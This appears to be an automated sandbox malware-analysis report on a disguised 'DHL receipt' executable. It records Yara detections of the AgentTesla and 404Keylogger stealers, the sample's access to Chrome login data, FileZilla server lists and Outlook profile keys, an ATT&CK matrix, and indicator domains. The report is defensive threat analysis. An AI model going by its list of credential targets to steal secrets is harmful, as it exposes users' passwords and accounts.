Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Users\user\Desktop\Recibo de entrega de DHL.exe VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected 404Keylogger

Show sources

Source: Yara match	File source: 00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Recibo de entrega de DHL.exe PID: 7008, type: MEMORY
Source: Yara match	File source: Process Memory Space: Recibo de entrega de DHL.exe PID: 2912, type: MEMORY
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3ea8390.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Recibo de entrega de DHL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3e142e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3ea8390.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3dd2ac0.2.raw.unpack, type: UNPACKEDPE

Yara detected AgentTesla

Show sources

Source: Yara match

File source: Process Memory Space: Recibo de entrega de DHL.exe PID: 2912, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\Recibo de entrega de DHL.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Recibo de entrega de DHL.exe PID: 7008, type: MEMORY
Source: Yara match	File source: Process Memory Space: Recibo de entrega de DHL.exe PID: 2912, type: MEMORY
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3ea8390.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Recibo de entrega de DHL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3e142e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3ea8390.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3dd2ac0.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected 404Keylogger

Show sources

Source: Yara match	File source: 00000005.00000002.906857662.0000000002E6E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.905487437.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Recibo de entrega de DHL.exe PID: 7008, type: MEMORY
Source: Yara match	File source: Process Memory Space: Recibo de entrega de DHL.exe PID: 2912, type: MEMORY
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3ea8390.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Recibo de entrega de DHL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3e142e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3ea8390.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Recibo de entrega de DHL.exe.3dd2ac0.2.raw.unpack, type: UNPACKEDPE

Yara detected AgentTesla

Show sources

Source: Yara match

File source: Process Memory Space: Recibo de entrega de DHL.exe PID: 2912, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection112	Masquerading1	OS Credential Dumping2	Security Software Discovery11	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	Input Capture11	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Archive Collected Data11	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Application Window Discovery1	Distributed Component Object Model	Data from Local System2	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol22	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information21	Cached Domain Credentials	System Network Configuration Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing3	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Timestomp1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Recibo de entrega de DHL.exe	31%	Virustotal		Browse
Recibo de entrega de DHL.exe	13%	ReversingLabs	Win32.Trojan.AgentTesla
Recibo de entrega de DHL.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.Recibo de entrega de DHL.exe.400000.0.unpack	100%	Avira	TR/ATRAPS.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
sapgroup.com.pk	0%	Virustotal		Browse
checkip.dyndns.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.jiyu-kobo.co.jp/nl-nj	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/A	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cnT	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/1	0%	Avira URL Cloud	safe
http://checkip.dyndns.org41k	0%	Avira URL Cloud	safe
http://mail.sapgroup.com.pk	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
